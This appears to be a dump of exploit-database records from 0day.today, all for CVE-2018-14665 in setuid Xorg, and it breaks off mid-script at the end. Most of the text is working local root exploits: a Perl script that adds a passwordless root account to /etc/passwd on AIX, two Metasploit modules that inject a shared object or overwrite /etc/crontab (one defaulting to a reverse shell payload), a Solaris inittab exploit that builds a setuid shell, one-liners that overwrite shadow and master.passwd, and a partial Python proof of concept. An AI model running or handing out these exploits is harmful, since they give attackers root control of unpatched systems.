AIX=\r\n,\r\n# and is replaced by '-config'.\r\n# ksh93 is used for ANSI-C quoting, and is installed by default on AIX.\r\n#\r\n# IBM has not yet released a patch as of 29/11/2018.\r\n#\r\n# See also:\r\n# https://lists.x.org/archives/xorg-announce/2018-October/002927.html\r\n# https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html\r\n# https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl\r\n#\r\n# Usage:\r\n# $ oslevel -s\r\n# 7100-04-00-0000\r\n# $ Xorg -version\r\n# =20\r\n# X Window System Version 7.1.1\r\n# Release Date: 12 May 2006\r\n# X Protocol Version 11, Revision 0, Release 7.1.1\r\n# Build Operating System: AIX IBM\r\n# Current Operating System: AIX sovma470 1 7 00C3C6F54C00\r\n# Build Date: 07 July 2006\r\n# Before reporting problems, check http://wiki.x.org\r\n# to make sure that you have the latest version.\r\n# Module Loader present\r\n# $ id\r\n# uid=3D16500(nmyo) gid=3D1(staff)\r\n# $ perl aixxorg.pl\r\n# [+] AIX X11 server local root exploit\r\n# [-] Checking for Xorg and ksh93=20\r\n# [-] Opening /etc/passwd=20\r\n# [-] Retrieving currently logged in users=20\r\n# [-] Generating Xorg command=20\r\n# [-] Opening /tmp/wow.ksh=20\r\n# [-] Writing Xorg command to /tmp/wow.ksh=20\r\n# [-] Backing up /etc/passwd to /tmp/passwd.backup=20\r\n# [-] Making /tmp/wow.ksh executable=20\r\n# [-] Executing /tmp/wow.ksh=20\r\n# [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh=20\r\n# [-] Done=20\r\n# [+] 'su wow' for root shell=20\r\n# $ su wow\r\n# # id\r\n# uid=3D0(root) gid=3D0(system)\r\n# # whoami\r\n# root\r\n \r\n#!/usr/bin/perl\r\nprint \"[+] AIX X11 server local root exploit\\n\";\r\n \r\n# Check Xorg is in path\r\nprint \"[-] Checking for Xorg and ksh93 \\n\";\r\nchomp($xorg =3D `command -v Xorg`);\r\nif ($xorg eq \"\"){=20\r\n print \"[X] Can't find Xorg binary, try hardcode it? exiting... \\n\";\r\n exit;\r\n}\r\n \r\n# Check ksh93 is in path\r\nchomp($ksh =3D `command -v ksh93`);\r\nif ($ksh eq \"\"){\r\n print \"[X] Can't find ksh93 binary, try hardcode it? exiting... \\n\";\r\n exit;\r\n}\r\n \r\n# Read in /etc/passwd\r\nprint \"[-] Opening /etc/passwd \\n\";\r\nopen($passwd_fh, '<', \"/etc/passwd\");\r\nchomp(@passwd_array =3D <$passwd_fh>);\r\nclose($passwd_fh);\r\n \r\n# Retrieve currently logged in users\r\nprint \"[-] Retrieving currently logged in users \\n\";\r\n@users =3D `who | cut -d' ' -f1 | sort | uniq`;\r\nchomp(@users);\r\n \r\n# For all logged in users, add their current passwd entry to string\r\n# that will be used to overwrite passwd\r\n$users_logged_in_passwd =3D '';\r\nforeach my $user (@users)\r\n{\r\n $user .=3D \":\";\r\n foreach my $line (@passwd_array)\r\n {\r\n if (index($line, $user) =3D=3D 0) {\r\n $users_logged_in_passwd =3D $users_logged_in_passwd . '\\n' . $l=\r\nine;\r\n }\r\n }\r\n}\r\n \r\n# Use '-config' as '-fp' (which is used in the original BSD exploit) is not=\r\n written to log\r\nprint \"[-] Generating Xorg command \\n\";\r\n$blob =3D '-config ' . '$\\'' . $users_logged_in_passwd . '\\nwow::0:0::/:/us=\r\nr/bin/ksh\\n#' . '\\'';\r\n \r\nprint \"[-] Opening /tmp/wow.ksh \\n\";=09=09\r\nopen($fr, '>', \"/tmp/wow.ksh\");\r\n \r\n# Use ksh93 for ANSI-C quoting\r\nprint \"[-] Writing Xorg command to /tmp/wow.ksh \\n\";\r\nprint $fr '#!' . \"$ksh\\n\";\r\nprint $fr \"$xorg $blob -logfile ../etc/passwd :1 > /dev/null 2>&1 \\n\";\r\nclose $fr;\r\n \r\n# Backup passwd=20\r\nprint \"[-] Backing up /etc/passwd to /tmp/passwd.backup \\n\";\r\nsystem(\"cp /etc/passwd /tmp/passwd.backup\");\r\n \r\n# Make script executable and run it\r\nprint \"[-] Making /tmp/wow.ksh executable \\n\";\r\nsystem(\"chmod +x /tmp/wow.ksh\");\r\nprint \"[-] Executing /tmp/wow.ksh \\n\";\r\nsystem(\"/tmp/wow.ksh\");\r\n \r\n# Replace overwritten passwd with: original passwd + wow user\r\nprint \"[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \\n\";\r\n$result =3D `su wow \"-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0=\r\n::/:/usr/bin/ksh' >> /etc/passwd\" && rm /tmp/wow.ksh`;\r\n \r\nprint \"[-] Done \\n\";\r\nprint \"[+] 'su wow' for root shell \\n\";\n\n# 0day.today [2018-12-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31731"}, {"lastseen": "2019-12-04T02:02:36", "description": "This Metasploit module attempts to gain root privileges with SUID Xorg X11 server versions 1.19.0 up to 1.20.3. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with CentOS 7 (1708). CentOS default install will require console auth for the users session. Xorg must have SUID permissions and may not start if running. On successful exploitation artifacts will be created consistent with starting Xorg.", "edition": 1, "published": "2019-10-22T00:00:00", "title": "Xorg X11 Server SUID modulepath Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2019-10-22T00:00:00", "id": "1337DAY-ID-33404", "href": "https://0day.today/exploit/description/33404", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GoodRanking\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::Kernel\r\n include Msf::Post::Linux::System\r\n\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Xorg X11 Server SUID modulepath Privilege Escalation',\r\n 'Description' => %q{\r\n This module attempts to gain root privileges with SUID Xorg X11 server\r\n versions 1.19.0 < 1.20.3.\r\n\r\n A permission check flaw exists for -modulepath and -logfile options when\r\n starting Xorg. This allows unprivileged users that can start the server\r\n the ability to elevate privileges and run arbitrary code under root\r\n privileges.\r\n\r\n This module has been tested with CentOS 7 (1708).\r\n CentOS default install will require console auth for the users session.\r\n Xorg must have SUID permissions and may not start if running.\r\n\r\n On successful exploitation artifacts will be created consistant\r\n with starting Xorg.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Narendra Shinde', # Discovery and exploit\r\n 'Aaron Ringo', # Metasploit module\r\n ],\r\n 'DisclosureDate' => 'Oct 25 2018',\r\n 'References' =>\r\n [\r\n [ 'CVE', '2018-14665' ],\r\n [ 'BID', '105741' ],\r\n [ 'EDB', '45697' ],\r\n [ 'EDB', '45742' ],\r\n [ 'EDB', '45832' ],\r\n [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html' ]\r\n ],\r\n 'Platform' => %w[linux unix solaris],\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'SessionTypes' => %w[shell meterpreter],\r\n 'Targets' =>\r\n [\r\n ['Linux x64', {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X64 } ],\r\n ['Linux x86', {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86 } ],\r\n ['Solaris x86', {\r\n 'Platform' => [ 'solaris', 'unix' ],\r\n 'Arch' => ARCH_SPARC } ],\r\n ['Solaris x64', {\r\n 'Platform' => [ 'solaris', 'unix' ],\r\n 'Arch' => ARCH_SPARC } ],\r\n ],\r\n 'DefaultTarget' => 0))\r\n\r\n register_advanced_options(\r\n [\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),\r\n OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),\r\n OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ]),\r\n OptString.new('sofile', [ true, 'Xorg shared object name for modulepath', 'libglx.so' ])\r\n ]\r\n )\r\n end\r\n\r\n\r\n def check\r\n # linux checks\r\n uname = cmd_exec \"uname\"\r\n if uname =~ /linux/i\r\n vprint_status \"Running additional check for Linux\"\r\n if datastore['ConsoleLock']\r\n user = cmd_exec \"id -un\"\r\n unless exist? \"/var/run/console/#{user}\"\r\n vprint_error \"No console lock for #{user}\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Console lock for #{user}\"\r\n end\r\n end\r\n\r\n # suid program check\r\n xorg_path = cmd_exec \"command -v Xorg\"\r\n unless xorg_path.include?(\"Xorg\")\r\n vprint_error \"Could not find Xorg executable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Xorg path found at #{xorg_path}\"\r\n unless setuid? xorg_path\r\n vprint_error \"Xorg binary #{xorg_path} is not SUID\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Xorg binary #{xorg_path} is SUID\"\r\n\r\n x_version = cmd_exec \"Xorg -version\"\r\n if x_version.include?(\"Release Date\")\r\n v = Gem::Version.new(x_version.scan(/\\d\\.\\d+\\.\\d+/).first)\r\n unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))\r\n vprint_error \"Xorg version #{v} not supported\"\r\n return CheckCode::Safe\r\n end\r\n elsif x_version.include?(\"Fatal server error\")\r\n vprint_error \"User probably does not have console auth\"\r\n vprint_error \"Below is Xorg -version output\"\r\n vprint_error x_version\r\n return CheckCode::Safe\r\n else\r\n vprint_warning \"Could not parse Xorg -version output\"\r\n return CheckCode::Appears\r\n end\r\n vprint_good \"Xorg version #{v} is vulnerable\"\r\n\r\n # process check for /X\r\n proc_list = cmd_exec \"ps ax\"\r\n if proc_list.include?('/X ')\r\n vprint_warning('Xorg in process list')\r\n return CheckCode::Appears\r\n end\r\n vprint_good('Xorg does not appear to be running')\r\n return CheckCode::Vulnerable\r\n end\r\n\r\n def check_arch_and_compile(path, data)\r\n cpu = ''\r\n if target['Arch'] == ARCH_X86\r\n cpu = Metasm::Ia32.new\r\n compile_with_metasm(cpu, path, data)\r\n elsif target['Arch'] == ARCH_SPARC\r\n compile_with_gcc(path, data)\r\n else\r\n cpu = Metasm::X86_64.new\r\n compile_with_metasm(cpu, path, data)\r\n end\r\n end\r\n\r\n def compile_with_metasm(cpu, path, data)\r\n shared_obj = Metasm::ELF.compile_c(cpu, data).encode_string(:lib)\r\n write_file(path, shared_obj)\r\n register_file_for_cleanup path\r\n\r\n chmod path\r\n rescue\r\n print_status('Failed to compile with Metasm. Falling back to compiling with GCC.')\r\n compile_with_gcc(path, data)\r\n end\r\n\r\n def compile_with_gcc(path, data)\r\n unless has_gcc?\r\n fail_with Failure::BadConfig, 'gcc is not installed'\r\n end\r\n vprint_good 'gcc is installed'\r\n\r\n src_path = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(6..10)}.c\"\r\n write_file(src_path, data)\r\n\r\n gcc_cmd = \"gcc -fPIC -shared -o #{path} #{src_path} -nostartfiles\"\r\n if session.type.eql? 'shell'\r\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\r\n end\r\n output = cmd_exec gcc_cmd\r\n register_file_for_cleanup src_path\r\n register_file_for_cleanup path\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{src_path} failed to compile\"\r\n end\r\n\r\n chmod path\r\n end\r\n\r\n def exploit\r\n check_status = check\r\n if check_status == CheckCode::Appears\r\n print_warning 'Could not get version or Xorg process possibly running, may fail'\r\n elsif check_status == CheckCode::Safe\r\n fail_with Failure::NotVulnerable, 'Target not vulnerable'\r\n end\r\n\r\n if is_root?\r\n fail_with Failure::BadConfig, 'This session already has root privileges'\r\n end\r\n\r\n unless writable? datastore['WritableDir']\r\n fail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\"\r\n end\r\n\r\n print_good 'Passed all initial checks for exploit'\r\n\r\n modulepath = datastore['WritableDir']\r\n sofile = \"#{modulepath}/#{datastore['sofile']}\"\r\n pscript = \"#{modulepath}/.session-#{rand_text_alphanumeric 5..10}\"\r\n xdisplay = datastore['Xdisplay']\r\n\r\n stub = %Q^\r\nextern int setuid(int);\r\nextern int setgid(int);\r\nextern int system(const char *__s);\r\n\r\nvoid _init(void) __attribute__((constructor));\r\n\r\nvoid __attribute__((constructor)) _init() {\r\nsetgid(0);\r\nsetuid(0);\r\nsystem(\"#{pscript} &\");\r\n }\r\n ^\r\n print_status 'Writing launcher and compiling'\r\n check_arch_and_compile(sofile, stub)\r\n\r\n # Uploading\r\n print_status 'Uploading your payload, this could take a while'\r\n if payload.arch.first == 'cmd'\r\n write_file(pscript, payload.encoded)\r\n else\r\n write_file(pscript, generate_payload_exe)\r\n end\r\n chmod pscript\r\n register_file_for_cleanup pscript\r\n\r\n\r\n # Actual exploit with cron overwrite\r\n print_status 'Exploiting'\r\n #Xorg -logfile derp -modulepath ',/tmp' :1\r\n xorg_cmd = \"Xorg -modulepath ',#{modulepath}' #{xdisplay} & >/dev/null\"\r\n cmd_exec xorg_cmd\r\n Rex.sleep 7\r\n cmd_exec \"pkill Xorg\"\r\n Rex.sleep 1\r\n end\r\nend\n\n# 0day.today [2019-12-03] #", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/33404"}, {"lastseen": "2019-02-06T07:16:40", "description": "Exploit for solaris/x86 platform in category local exploits", "edition": 1, "published": "2019-01-14T00:00:00", "title": "xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab) Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2019-01-14T00:00:00", "id": "1337DAY-ID-31947", "href": "https://0day.today/exploit/description/31947", "sourceData": "#!/bin/sh\r\n\r\n# Exploit Title: xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris11 inittab)\r\n# Date: 2018-11-25\r\n# Exploit Author: Marco Ivaldi\r\n# Vendor Homepage: https://www.x.org/\r\n# Version: xorg-x11-server 1.19.0 - 1.20.2\r\n# Tested on: Oracle Solaris 11.4\r\n# CVE : CVE-2018-14665\r\n\r\n#\r\n# raptor_solgasm - xorg-x11-server LPE via Solaris inittab\r\n# Copyright (c) 2018 Marco Ivaldi <[email\u00a0protected]>\r\n#\r\n# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission \r\n# check for -modulepath and -logfile options when starting Xorg. X server \r\n# allows unprivileged users with the ability to log in to the system via \r\n# physical console to escalate their privileges and run arbitrary code under \r\n# root privileges (CVE-2018-14665).\r\n#\r\n# \"In video games, this is what they call respawning\" -- Nick Sax\r\n#\r\n# This exploit targets /etc/inittab in order to escalate privileges to root\r\n# on Solaris 11 (no need to be connected to a physical console). Messing with \r\n# inittab is considerably dangerous and you may trash your system, however the\r\n# other potential vectors (cron, passwd, sudo, ld.config, etc.) either don't \r\n# work or are even worse. Still, DON'T RUN UNLESS YOU KNOW WHAT YOU ARE DOING!\r\n#\r\n# See also:\r\n# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm\r\n#\r\n# Usage:\r\n# [email\u00a0protected]:~$ chmod +x raptor_solgasm\r\n# [email\u00a0protected]:~$ ./raptor_solgasm\r\n# [...]\r\n# Now please be patient for a few minutes...\r\n# [...]\r\n# To avoid trashing the system, remember to: mv /etc/inittab.old /etc/inittab\r\n# -rw-r--r-- 1 root staff 13870 nov 24 22:01 /etc/inittab\r\n# -rw-r--r-- 1 root sys 967 nov 24 20:01 /etc/inittab.old\r\n# -rwsrwxrwx 1 root root 1249080 nov 24 22:05 /tmp/pwned\r\n# [email\u00a0protected]:/etc# id\r\n# uid=0(root) gid=0(root)\r\n#\r\n# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):\r\n# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5]\r\n# Oracle Solaris 11 SPARC [untested]\r\n#\r\n\r\necho \"raptor_solgasm - xorg-x11-server LPE via Solaris inittab\"\r\necho \"Copyright (c) 2018 Marco Ivaldi <[email\u00a0protected]>\"\r\n\r\n# prepare the payload\r\ncat << EOF > /tmp/solgasm\r\ncp /bin/zsh /tmp/pwned # fallback in case gcc is not available\r\necho \"main(){setuid(0);setgid(0);system(\\\"/bin/bash\\\");}\" > /tmp/pwned.c\r\ngcc /tmp/pwned.c -o /tmp/pwned\r\nchmod 4777 /tmp/pwned\r\nEOF\r\nchmod +x /tmp/solgasm\r\n\r\n# trigger the bug\r\nPWN=x$(cat /dev/urandom | env LC_CTYPE=C tr -dc '[:lower:]' | fold -3 | head -1)\r\ncd /etc\r\nXorg -fp \"${PWN}::respawn:/tmp/solgasm\" -logfile inittab :1 &\r\nsleep 5\r\npkill Xorg\r\n\r\n# run the setuid shell\r\necho\r\necho \"Now please be patient for a few minutes...\"\r\necho\r\nuntil [ -u /tmp/pwned ]; do sleep 1; done\r\necho \"To avoid trashing the system remember to mv /etc/inittab.old /etc/inittab\"\r\nls -l /etc/inittab*\r\nls -l /tmp/pwned\r\nsleep 1\r\n/tmp/pwned\n\n# 0day.today [2019-02-06] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/31947"}, {"lastseen": "2018-10-26T20:41:22", "description": "Exploit for multiple platform in category local exploits", "edition": 1, "published": "2018-10-26T00:00:00", "title": "xorg-x11-server 1.20.3 - Local Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-10-26T00:00:00", "id": "1337DAY-ID-31436", "href": "https://0day.today/exploit/description/31436", "sourceData": "xorg-x11-server Local Privilege Escalation\r\n\r\n#CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet\r\n \r\ncd /etc; Xorg -fp \"root::16431:0:99999:7:::\" -logfile shadow :1;su\r\n \r\nOverwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.\r\n \r\n \r\n \r\n \r\n \r\n#!/bin/sh\r\n# local privilege escalation in X11 currently\r\n# unpatched in OpenBSD 6.4 stable - exploit\r\n# uses cve-2018-14665 to overwrite files as root. \r\n# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid\r\n# and vulnerable in default OpenBSD.\r\n#\r\n# - https://hacker.house\r\necho [+] OpenBSD 6.4-stable local root exploit\r\ncd /etc\r\nXorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &\r\nsleep 5\r\npkill Xorg\r\necho [-] dont forget to mv and chmod /etc/master.passwd.old back \r\necho [+] type 'Password1' and hit enter for root\r\nsu -\r\n \r\n \r\nEBB Note ~ Another version of it: https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850\n\n# 0day.today [2018-10-26] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31436"}, {"lastseen": "2018-12-01T19:39:11", "description": "This Metasploit module attempts to gain root privileges with SUID Xorg X11 server versions 1.19.0 up to 1.20.3. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This Metasploit module has been tested with OpenBSD 6.3, 6.4, and CentOS 7 (1708). CentOS default install will require console auth for the users session. Cron launches the payload so if Selinux is enforcing exploitation may still be possible, but the module will bail. Xorg must have SUID permissions and may not start if running. On exploitation a crontab.old backup file will be created by Xorg. This Metasploit module will remove the .old file and restore crontab after successful exploitation. Failed exploitation may result in a corrupted crontab. On successful exploitation artifacts will be created consistent with starting Xorg and running a cron.", "edition": 1, "published": "2018-11-26T00:00:00", "title": "Xorg X11 Server SUID Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-11-26T00:00:00", "id": "1337DAY-ID-31674", "href": "https://0day.today/exploit/description/31674", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GoodRanking\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::Kernel\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Xorg X11 Server SUID privilege escalation',\r\n 'Description' => %q{\r\n This module attempts to gain root privileges with SUID Xorg X11 server\r\n versions 1.19.0 < 1.20.3.\r\n\r\n A permission check flaw exists for -modulepath and -logfile options when\r\n starting Xorg. This allows unprivileged users that can start the server\r\n the ability to elevate privileges and run arbitrary code under root\r\n privileges.\r\n\r\n This module has been tested with OpenBSD 6.3, 6.4, and CentOS 7 (1708).\r\n CentOS default install will require console auth for the users session.\r\n Cron launches the payload so if Selinux is enforcing exploitation\r\n may still be possible, but the module will bail.\r\n Xorg must have SUID permissions and may not start if running.\r\n\r\n On exploitation a crontab.old backup file will be created by Xorg.\r\n This module will remove the .old file and restore crontab after\r\n successful exploitation. Failed exploitation may result in a corrupted\r\n crontab. On successful exploitation artifacts will be created consistant\r\n with starting Xorg and running a cron.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Narendra Shinde', # Discovery and exploit\r\n 'Raptor - 0xdea', # Modified exploit for cron\r\n 'Aaron Ringo', # Metasploit module\r\n 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module\r\n ],\r\n 'DisclosureDate' => 'Oct 25 2018',\r\n 'References' =>\r\n [\r\n [ 'CVE', '2018-14665' ],\r\n [ 'BID', '105741' ],\r\n [ 'EDB', '45697' ],\r\n [ 'EDB', '45742' ],\r\n [ 'EDB', '45832' ],\r\n [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],\r\n [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]\r\n ],\r\n 'Platform' => %w[openbsd linux],\r\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\r\n 'SessionTypes' => %w[shell meterpreter],\r\n 'Targets' =>\r\n [\r\n ['OpenBSD', {\r\n 'Platform' => 'unix',\r\n 'Arch' => [ ARCH_CMD ] } ],\r\n ['Linux x64', {\r\n 'Platform' => 'linux',\r\n 'Arch' => [ ARCH_X64 ] } ],\r\n ['Linux x86', {\r\n 'Platform' => 'linux',\r\n 'Arch' => [ ARCH_X86 ] } ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'PAYLOAD' => 'cmd/unix/reverse_openssl',\r\n 'WfsDelay' => 120\r\n },\r\n 'DefaultTarget' => 0))\r\n\r\n register_advanced_options(\r\n [\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),\r\n OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),\r\n OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ])\r\n ]\r\n )\r\n end\r\n\r\n\r\n def check\r\n\r\n # linux checks\r\n uname = cmd_exec \"uname\"\r\n if uname =~ /linux/i\r\n vprint_status \"Running additional check for Linux\"\r\n if datastore['ConsoleLock']\r\n user = cmd_exec \"id -un\"\r\n unless exist? \"/var/run/console/#{user}\"\r\n vprint_error \"No console lock for #{user}\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Console lock for #{user}\"\r\n end\r\n if selinux_installed?\r\n if selinux_enforcing?\r\n vprint_error 'Selinux is enforcing'\r\n return CheckCode::Safe\r\n end\r\n end\r\n vprint_good \"Selinux is not an issue\"\r\n end\r\n\r\n # suid program check\r\n xorg_path = cmd_exec \"command -v Xorg\"\r\n unless xorg_path.include?(\"Xorg\")\r\n vprint_error \"Could not find Xorg executable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Xorg path found at #{xorg_path}\"\r\n unless setuid? xorg_path\r\n vprint_error \"Xorg binary #{xorg_path} is not SUID\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Xorg binary #{xorg_path} is SUID\"\r\n\r\n # version check\r\n x_version = cmd_exec \"Xorg -version\"\r\n if x_version.include?(\"Release Date\")\r\n v = Gem::Version.new(x_version.scan(/\\d\\.\\d+\\.\\d+/).first)\r\n unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))\r\n vprint_error \"Xorg version #{v} not supported\"\r\n return CheckCode::Safe\r\n end\r\n elsif x_version.include?(\"Fatal server error\")\r\n vprint_error \"User probably does not have console auth\"\r\n vprint_error \"Below is Xorg -version output\"\r\n vprint_error x_version\r\n return CheckCode::Safe\r\n else\r\n vprint_warning \"Could not parse Xorg -version output\"\r\n return CheckCode::Appears\r\n end\r\n vprint_good \"Xorg version #{v} is vulnerable\"\r\n\r\n # process check for /X\r\n proc_list = cmd_exec \"ps ax\"\r\n if proc_list.include?('/X ')\r\n vprint_warning('Xorg in process list')\r\n return CheckCode::Appears\r\n end\r\n vprint_good('Xorg does not appear running')\r\n return CheckCode::Vulnerable\r\n end\r\n\r\n def on_new_session(session)\r\n if session.type.to_s.eql? 'meterpreter'\r\n session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'\r\n session.sys.process.execute '/bin/sh', \"-c \\\"#{@clean_up}\\\"\"\r\n else\r\n session.shell_command(@clean_up)\r\n end\r\n print_good \"Returning session after cleaning\"\r\n ensure\r\n super\r\n end\r\n\r\n def exploit\r\n\r\n check_status = check\r\n if check_status == CheckCode::Appears\r\n print_warning 'Could not get version or Xorg process possibly running, may fail'\r\n elsif check_status == CheckCode::Safe\r\n fail_with Failure::NotVulnerable, 'Target not vulnerable'\r\n end\r\n\r\n if is_root?\r\n fail_with Failure::BadConfig, 'This session already has root privileges'\r\n end\r\n\r\n unless writable? datastore['WritableDir']\r\n fail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\"\r\n end\r\n\r\n print_good 'Passed all initial checks for exploit'\r\n\r\n pscript = \"#{datastore['WritableDir']}/.session-#{rand_text_alphanumeric 5..10}\"\r\n @clean_up = \"/bin/cat #{pscript}.b > /etc/crontab ; /bin/rm -f #{pscript}.b /etc/crontab.old\"\r\n xdisplay = datastore['Xdisplay']\r\n\r\n # Uploading file crontab will run\r\n print_status 'Uploading your payload, this could take a while'\r\n if payload.arch.first == 'cmd'\r\n write_file(pscript, payload.encoded)\r\n else\r\n write_file(pscript, generate_payload_exe)\r\n end\r\n register_file_for_cleanup pscript\r\n chmod pscript\r\n\r\n # Exploit steps on crontab so backing it up\r\n cmd_exec \"cat /etc/crontab > #{pscript}.b\"\r\n # Actual exploit with cron overwrite\r\n print_status 'Trying /etc/crontab overwrite'\r\n cmd_exec \"cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab #{xdisplay} & >/dev/null\"\r\n Rex.sleep 5\r\n cmd_exec \"pkill Xorg\"\r\n Rex.sleep 1\r\n cron_check = cmd_exec \"grep -F #{pscript} /etc/crontab\"\r\n unless cron_check.include? pscript\r\n rm_f \"#{pscript}.b\"\r\n print_error 'Deleting crontab backup'\r\n fail_with Failure::NotVulnerable, '/etc/crontab not modified'\r\n end\r\n print_good '/etc/crontab overwrite successful. Waiting for job to run (may take a minute)...'\r\n end\r\nend\n\n# 0day.today [2018-12-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31674"}, {"lastseen": "2018-11-14T05:04:39", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2018-11-13T00:00:00", "title": "xorg-x11-server < 1.20.1 - Local Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-11-13T00:00:00", "id": "1337DAY-ID-31593", "href": "https://0day.today/exploit/description/31593", "sourceData": "# Exploit Title: xorg-x11-server < 1.20.1 - Local Privilege Escalation (RHEL 7)\r\n# Exploit Author: @bolonobolo\r\n# Vendor Homepage: https://www.x.org/\r\n# Version: 1.19.5\r\n# Tested on: RHEL 7.3 && 7.5\r\n# CVE : CVE-2018-14665\r\n# Explanation\r\n# The only condition that have to be met for this PE to work via SSH, is that the legitimate non-root user \r\n# has to be logged in trought console at the moment the PE script launched.\r\n# In fact during the logged in session of the legitimate non-root user, \r\n# a file with the name of the non-root user will be created in the /var/run/console folder. \r\n# With that file present, the same non-root user can launch a Xorg command via SSH. \r\n# \r\n# Usage: $ python poc.py\r\n# $ python poc.py \r\n# [*] Waiting for bolo to connect to the console\r\n# [*] OK --> bolo console opened\r\n# [*] Building root shell wait 2 minutes\r\n# [*] crontab overwritten\r\n# \r\n# ... cut Xorg output ...\r\n# \r\n# [*] Xorg killed\r\n# (II) Server terminated successfully (0). Closing log file.\r\n# [*] Don't forget to cleanup /etc/crontab and /tmp dir\r\n# sh-4.2# id && whoami\r\n# uid=0(root) gid=0(root) gruppi=0(root),1001(bolo)\r\n# root\r\n# sh-4.2#\r\n \r\n \r\n#!/usr/bin/python\r\nimport os\r\nimport getpass\r\nimport subprocess\r\n \r\nuserList = []\r\npath=\"/var/run/console/\"\r\n \r\ndef getWhoami():\r\n return getpass.getuser()\r\n \r\ndef getConsole(path):\r\n p = subprocess.Popen([\"ls\", path], stdout=subprocess.PIPE)\r\n (console, err) = p.communicate()\r\n consoleList = 